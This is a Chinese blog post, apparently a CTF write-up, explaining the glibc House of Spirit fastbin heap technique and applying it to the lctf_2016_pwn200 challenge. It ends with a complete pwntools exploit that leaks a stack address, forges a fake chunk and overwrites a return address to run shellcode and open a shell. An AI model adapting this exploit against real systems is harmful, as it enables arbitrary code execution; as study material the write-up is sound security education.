

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="1c3y">
  <meta name="keywords" content="">
  
    <meta name="description" content="前置知识House of Spirit是组合型的漏洞利用，它是指针覆盖和堆管理机制的组合利用。该技术的核心在于在目标位置处伪造fastbin chunk，并将其释放，从而达到分配指定地址的chunk的目的。要构造fastbin fake chunk，并且将其释放时，可以将其放入到对应的fastbin链表中，需要绕过一些必要的检测，即：  fake chunk 的 ISMMAP 位不能为1，因为 f">
<meta property="og:type" content="article">
<meta property="og:title" content="House of Spirit学习">
<meta property="og:url" content="http://example.com/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Icey&#39;s Blog">
<meta property="og:description" content="前置知识House of Spirit是组合型的漏洞利用，它是指针覆盖和堆管理机制的组合利用。该技术的核心在于在目标位置处伪造fastbin chunk，并将其释放，从而达到分配指定地址的chunk的目的。要构造fastbin fake chunk，并且将其释放时，可以将其放入到对应的fastbin链表中，需要绕过一些必要的检测，即：  fake chunk 的 ISMMAP 位不能为1，因为 f">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/checksec.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/welcome.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/moneyR.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/buf_and_dest7.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/heap_mana.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/in.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/out.png">
<meta property="og:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/offsetR.png">
<meta property="article:published_time" content="2021-03-20T06:49:00.000Z">
<meta property="article:modified_time" content="2021-03-28T08:26:53.708Z">
<meta property="article:author" content="1c3y">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="how2heap">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/checksec.png">
  
  
  <title>House of Spirit学习 - Icey&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/agate.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Icey's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Icey&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="House of Spirit学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-03-20 14:49" pubdate>
        2021年3月20日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.9k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      33 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">House of Spirit学习</h1>
            
            <div class="markdown-body">
              <h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><p>House of Spirit是组合型的漏洞利用，它是指针覆盖和堆管理机制的组合利用。该技术的核心在于在目标位置处伪造fastbin chunk，并将其释放，从而达到分配<strong>指定地址</strong>的chunk的目的。<br>要构造fastbin fake chunk，并且将其释放时，可以将其放入到对应的fastbin链表中，需要绕过一些必要的检测，即：</p>
<ul>
<li>fake chunk 的 ISMMAP 位不能为1，因为 free 时，如果是 mmap 的 chunk，会单独处理。</li>
<li>fake chunk 地址需要对齐， MALLOC_ALIGN_MASK</li>
<li>fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。</li>
<li>fake chunk 的 next chunk 的大小不能小于 <strong>2 * SIZE_SZ</strong>，同时也不能大于<strong>av-&gt;system_mem</strong> 。</li>
<li>fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。</li>
</ul>
<hr>
<h1 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h1><ul>
<li>想要利用的目标区域的前段空间和后段空间都是可控的区域。<strong>一般来说想要控制的区域多为返回地址或函数指针，正常情况下，该内存区域我们是无法通过输入数据来进行控制的，为了利用hos技术来改写该区域，我们需要前段空间和后段空间均可控。</strong></li>
<li>存在堆变量指针覆盖指向可控区域</li>
</ul>
<table>
<thead>
<tr>
<th>HOS</th>
</tr>
</thead>
<tbody><tr>
<td>前段空间</td>
</tr>
<tr>
<td><strong>目标区域</strong></td>
</tr>
<tr>
<td>后段空间</td>
</tr>
</tbody></table>
<hr>
<h1 id="例题：lctf-2016-pwn200"><a href="#例题：lctf-2016-pwn200" class="headerlink" title="例题：lctf_2016_pwn200"></a>例题：lctf_2016_pwn200</h1><h2 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>静态分析</h2><h3 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h3><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/checksec.png" srcset="/img/loading.gif" lazyload><br>关闭了栈不可执行，可以写入shellcode。</p>
<h2 id="IDA"><a href="#IDA" class="headerlink" title="IDA"></a>IDA</h2><h3 id="welcome函数"><a href="#welcome函数" class="headerlink" title="welcome函数"></a>welcome函数</h3><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/welcome.png" srcset="/img/loading.gif" lazyload><br>这里存在off-by-one漏洞，如果输入48个字符，printf不会检测到 <strong>\x00</strong> 的存在，而v2紧接着就是rbp，可以泄露rbp地址。</p>
<h3 id="input-money-and-menu函数"><a href="#input-money-and-menu函数" class="headerlink" title="input_money_and_menu函数"></a>input_money_and_menu函数</h3><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/moneyR.png" srcset="/img/loading.gif" lazyload><br>先申请0x40大小的内存空间，并将malloc指针赋给dest；再向缓冲区读入内容，并将内容复制到dest指向的内存中，最后将dest指针赋给全局变量ptr。<br>这里buf和dest存在<strong>相邻变量覆盖</strong>，输入buf的内容会将dest覆盖掉。如下图所示：<br><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/buf_and_dest7.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="heap-management函数"><a href="#heap-management函数" class="headerlink" title="heap_management函数"></a>heap_management函数</h3><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/heap_mana.png" srcset="/img/loading.gif" lazyload></p>
<ul>
<li>1.check in</li>
<li>2.check out</li>
<li>3.goodbye</li>
</ul>
<h4 id="check-in"><a href="#check-in" class="headerlink" title="check in"></a>check in</h4><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/in.png" srcset="/img/loading.gif" lazyload><br>会先检查ptr是否为空，如果不为空，会根据输入的大小和内容创建一个新的堆块</p>
<h4 id="check-out"><a href="#check-out" class="headerlink" title="check out"></a>check out</h4><p><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/out.png" srcset="/img/loading.gif" lazyload><br>释放堆块并置NULL</p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><h3 id="栈帧的具体情况如下："><a href="#栈帧的具体情况如下：" class="headerlink" title="栈帧的具体情况如下："></a>栈帧的具体情况如下：</h3><table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><strong>input_money_and_menu栈帧</strong></td>
<td><strong>buf</strong></td>
</tr>
<tr>
<td></td>
<td><strong>buf</strong></td>
</tr>
<tr>
<td></td>
<td><strong>dest</strong></td>
</tr>
<tr>
<td></td>
<td><strong>old rbp</strong></td>
</tr>
<tr>
<td><strong>welcome栈帧</strong></td>
<td><strong>input_money_and_menu ret</strong></td>
</tr>
<tr>
<td></td>
<td>……</td>
</tr>
<tr>
<td></td>
<td><strong>id</strong></td>
</tr>
<tr>
<td></td>
<td><strong>v2(name)</strong></td>
</tr>
<tr>
<td></td>
<td><strong>old rbp</strong></td>
</tr>
<tr>
<td><strong>main栈帧</strong></td>
<td><strong>welcome ret</strong></td>
</tr>
<tr>
<td></td>
<td><strong>…</strong></td>
</tr>
<tr>
<td></td>
<td><strong>old rbp</strong></td>
</tr>
<tr>
<td><strong>start栈帧</strong></td>
<td><strong>main ret</strong></td>
</tr>
</tbody></table>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><ul>
<li>在输入name的时候，将shellcode部署在name的位置，并调整好填充大小，以便泄露rbp地址</li>
<li>得到rbp地址后可以得到栈上的地址，shellcode和fake_chunk的地址就可以根据偏移得到</li>
<li>在输入buf的时候部署好fake chunk，同时注意绕过条件，并利用相邻地址覆盖将dest覆盖为fake chunk的地址，这样ptr也指向了fake chunk。这里fake chunk的大小要包括rbp和<strong>input_money_and_menu ret</strong>，方便后续修改</li>
<li>check out释放fake chunk，然后check in申请一个堆块，这样rbp和<strong>input_money_and_menu ret</strong>就可以为我们所用了，将shellcode addr写入ret，退出程序时就可以<strong>getshell</strong></li>
</ul>
<h2 id="动态调试"><a href="#动态调试" class="headerlink" title="动态调试"></a>动态调试</h2><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">ru(<span class="hljs-string">&#x27;who are u?\n&#x27;</span>)<br>payload = shellcode<br>payload = payload.ljust(<span class="hljs-number">0x30</span>)<br>s(payload)<br>ru(payload)<br><br>leak_addr = u64(r(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>log.success(<span class="hljs-string">&#x27;rbp: 0x%x&#x27;</span> % leak_addr)<br><br>ru(<span class="hljs-string">&#x27;give me your id ~~?\n&#x27;</span>)<br>sl(<span class="hljs-string">&#x27;32&#x27;</span>)<br><br>shellcode_addr = leak_addr - <span class="hljs-number">0x50</span><br>fake_chunk_addr = leak_addr - <span class="hljs-number">0x90</span><br>ru(<span class="hljs-string">&#x27;give me money~\n&#x27;</span>)<br><span class="hljs-comment"># payload = p64(0)*4 + p64(0) + p64(0x41) + p64(0) + p64(fake_chunk_addr)</span><br>payload = <span class="hljs-string">&#x27;b&#x27;</span>*<span class="hljs-number">0x20</span><br>s(payload)<br>debug()<br></code></pre></div></td></tr></table></figure>
<p>leak得到rbp地址后，看下shellcode和要部署的fake chunk的data段地址的偏移：<br><img src="https://gitee.com/see1c3y/buuctf/raw/master/HOS_learning/offsetR.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">shellcode_addr = leak_addr - <span class="hljs-number">0x50</span><br>fake_chunk_addr = leak_addr - <span class="hljs-number">0x90</span><br></code></pre></div></td></tr></table></figure>

<p>后面就不难了，按照利用思路一步一步走就可以了（其实是懒得写了XD</p>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br><span class="hljs-keyword">from</span> sys <span class="hljs-keyword">import</span> argv<br><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]<br>binary = <span class="hljs-string">&#x27;./lctf_2016_pwn200&#x27;</span><br>context.binary = binary<br>elf = ELF(binary,checksec=<span class="hljs-literal">False</span>)<br>shellcode = asm(shellcraft.amd64.linux.sh(), arch=<span class="hljs-string">&#x27;amd64&#x27;</span>)<br>p = remote(<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>) <span class="hljs-keyword">if</span> args[<span class="hljs-number">1</span>] == <span class="hljs-string">&#x27;r&#x27;</span> <span class="hljs-keyword">else</span> process(binary) <br><br>s       = <span class="hljs-keyword">lambda</span> data               :p.send(<span class="hljs-built_in">str</span>(data))<br>sa      = <span class="hljs-keyword">lambda</span> delim,data         :p.sendafter(delim, <span class="hljs-built_in">str</span>(data))<br>sl      = <span class="hljs-keyword">lambda</span> data               :p.sendline(<span class="hljs-built_in">str</span>(data))<br>sla     = <span class="hljs-keyword">lambda</span> delim,data         :p.sendlineafter(delim, <span class="hljs-built_in">str</span>(data))<br>r       = <span class="hljs-keyword">lambda</span> num=<span class="hljs-number">4096</span>           :p.recv(num)<br>ru      = <span class="hljs-keyword">lambda</span> delims, drop=<span class="hljs-literal">True</span>  :p.recvuntil(delims, drop)<br>uu64    = <span class="hljs-keyword">lambda</span> data               :u64(data.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\0&#x27;</span>))<br>leak    = <span class="hljs-keyword">lambda</span> name,addr          :log.success(<span class="hljs-string">&#x27;&#123;&#125; = &#123;:#x&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(name, addr))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>():</span><br>    <span class="hljs-comment"># gdb.attach(p)</span><br>    <span class="hljs-comment"># raw_input(&#x27;en..&#x27;)</span><br>    <span class="hljs-built_in">print</span> <span class="hljs-string">&quot;pid &quot;</span> + <span class="hljs-built_in">str</span>(proc.pidof(p))<br>    raw_input(<span class="hljs-string">&quot;attach me&quot;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exp</span>():</span><br>    ru(<span class="hljs-string">&#x27;who are u?\n&#x27;</span>)<br>    payload = shellcode<br>    payload = payload.ljust(<span class="hljs-number">0x30</span>)<br>    s(payload)<br>    ru(payload)<br><br>    leak_addr = u64(r(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>    log.success(<span class="hljs-string">&#x27;rbp: 0x%x&#x27;</span> % leak_addr)<br><br>    ru(<span class="hljs-string">&#x27;give me your id ~~?\n&#x27;</span>)<br>    sl(<span class="hljs-string">&#x27;32&#x27;</span>)<br><br>    shellcode_addr = leak_addr - <span class="hljs-number">0x50</span><br>    fake_chunk_addr = leak_addr - <span class="hljs-number">0x90</span><br>    ru(<span class="hljs-string">&#x27;give me money~\n&#x27;</span>)<br>    payload = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">4</span> + p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">0x41</span>) + p64(<span class="hljs-number">0</span>) + p64(fake_chunk_addr)<br>    s(payload)<br><br>    ru(<span class="hljs-string">&#x27;\n=======EASY HOTEL========\n1. check in\n2. check out\n3. goodbye\nyour choice : &#x27;</span>)<br>    sl(<span class="hljs-number">2</span>)<br><br>    ru(<span class="hljs-string">&#x27;\n=======EASY HOTEL========\n1. check in\n2. check out\n3. goodbye\nyour choice : &#x27;</span>)<br>    sl(<span class="hljs-number">1</span>)<br><br>    ru(<span class="hljs-string">&#x27;how long?\n&#x27;</span>)<br>    sl(<span class="hljs-string">&#x27;48&#x27;</span>)<br>    p.recvline(<span class="hljs-string">&#x27;48&#x27;</span>)<br>    payload = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span> + p64(shellcode_addr)<br>    payload = payload.ljust(<span class="hljs-number">0x30</span>, <span class="hljs-string">&#x27;\x00&#x27;</span>)<br>    s(payload)<br>    <span class="hljs-comment"># debug()</span><br><br>    ru(<span class="hljs-string">&#x27;\n=======EASY HOTEL========\n1. check in\n2. check out\n3. goodbye\nyour choice : &#x27;</span>)<br>    sl(<span class="hljs-number">3</span>)<br>    p.interactive()<br>    <span class="hljs-comment"># debug()</span><br><br>exp()<br></code></pre></div></td></tr></table></figure>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%BC%8F%E6%B4%9E/">二进制漏洞</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/pwn/">pwn</a>
                    
                      <a class="hover-with-bg" href="/tags/how2heap/">how2heap</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">BUUOJ刷题记录补档-1</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/">
                        <span class="hidden-mobile">V&N2020 公开赛 simpleHeap</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
